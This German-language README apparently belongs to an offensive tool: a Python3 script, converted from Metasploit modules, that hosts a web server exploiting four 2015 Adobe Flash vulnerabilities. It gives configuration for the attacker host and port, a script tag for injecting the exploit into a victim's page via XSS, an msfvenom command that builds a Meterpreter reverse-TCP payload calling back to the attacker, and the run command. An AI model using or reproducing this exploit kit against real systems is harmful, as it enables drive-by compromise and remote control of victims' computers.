
Konvertierte Metasploit-Exploits für Adobe Flash-Sicherheitslücken CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 und CVE-2015-5122 in ein Python3-Skript.
Konvertierte Metasploit-Exploits für Adobe Flash-Sicherheitslücken CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 und CVE-2015-5122 in ein Python3-Skript.
Dieses Skript hostet einen Webserver, der jeweils eine der folgenden Adobe Flash-Sicherheitslücken ausnutzen kann:
Sie müssen Änderungen (hier beschrieben) an exploit.py vornehmen, um Ihren Anforderungen zu entsprechen.
hostname = "192.168.1.100"
serverPort = 8080
xss = False
True gesetzt, wird die erste Anfrage des Opfers an den Server als JavaScript behandelt:
<script src="http://192.168.1.100:8080/"></script>False gesetzt, wird die erste Anfrage des Opfers an den Server als HTML behandelt:
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64Hinweis: Der einzige Payload, der bei mir funktioniert hat, ist
windows/meterpreter/reverse_tcp.
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
Führen Sie den folgenden Befehl im selben Verzeichnis wie die bösartigen SWF-Dateien aus, um das Adobe Flash-Exploit-Skript auszuführen:
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599